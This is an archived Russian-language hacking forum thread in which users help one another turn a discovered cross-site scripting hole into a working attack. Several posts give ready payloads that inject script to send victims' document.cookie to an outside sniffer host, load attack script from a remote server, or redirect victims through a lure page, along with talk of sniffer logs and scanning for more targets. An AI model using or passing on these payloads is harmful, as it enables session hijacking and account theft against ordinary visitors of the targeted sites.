PDA

Просмотр полной версии : помогите с Xss

Aerot1smo
01.02.2007, 20:21
короче нашёл на сайте хсс и вот хочу спросить,как ссылку сделать?я так сделал,правильно ли?

site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie;</script>

и ещё,я так понял что там где site.com надо ставить ссылку той страница где я нашёл ХСС,так ли это?
Micr0b
01.02.2007, 23:07
да ты все верно понял но мне кажется лутше делай так:

1) site.com"><script%20src=http://xss-xss.nm.ru/js.js></script>
js.js
img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie;
2) Или залей на какуюто страницу лутше index.htm

<script language="JavaScript">
document.location.href="http://site.com'><script%20src=http://xss-xss.nm.ru/js.js></script>";
</script>

кажысь так все у тебя получится
Aerot1smo
01.02.2007, 23:32
да,я так пробывал тока вот чёто неприходили данные.На халявных хостах будет пахать?
Micr0b
02.02.2007, 00:13
должно ... если у тебя неполучится на фрее-хостах попробуй ачатовской сниффер.)
Aerot1smo
02.02.2007, 09:57
а смотрите,я сделал себе снифф на ачате http://antichat.org/s/***/log.php
какой адресс замой картинки то?

и ещё,я вот ищу хсс спомощью проги Acunetix 4
и он находит хсс в "/",возможно ли её осуществить,если да то как?
o3,14um
02.02.2007, 20:59
попробуй так:
site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+escape(document.cookie)</script>
Yrik123
07.02.2007, 11:35
попробуй так:
site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+escape(document.cookie)</script>

Ребят скажите почему это не работает:
Вызов из ява-скрипта :
<script>
img = new Image();
img.src = "http://адрес/sniffer.gif?"+document.cookie;
</script>
пробовал так, создал файлик html, его содержание:
<br>
<br>
<a href="http://google.com">google</a><br>
<script>
img = new image();
img.src = "http://адрес/sniffer.gif?"+document.cookie;
</script>
<br>

На снифер ничего не приходит, почему скажите пожалуйста...Читал много, все одно и тоже, но не фига...снифер Kanickа...
Pashahak
07.02.2007, 19:41
короче нашёл на сайте хсс и вот хочу спросить,как ссылку сделать?я так сделал,правильно ли?

site.com"><script>img=new Image();img.src="http://liz0.xf.cz/i.gif?"+document.cookie;</script>

и ещё,я так понял что там где site.com надо ставить ссылку той страница где я нашёл ХСС,так ли это?

Только зачем страница с XSS где ты нашел, не пойму!?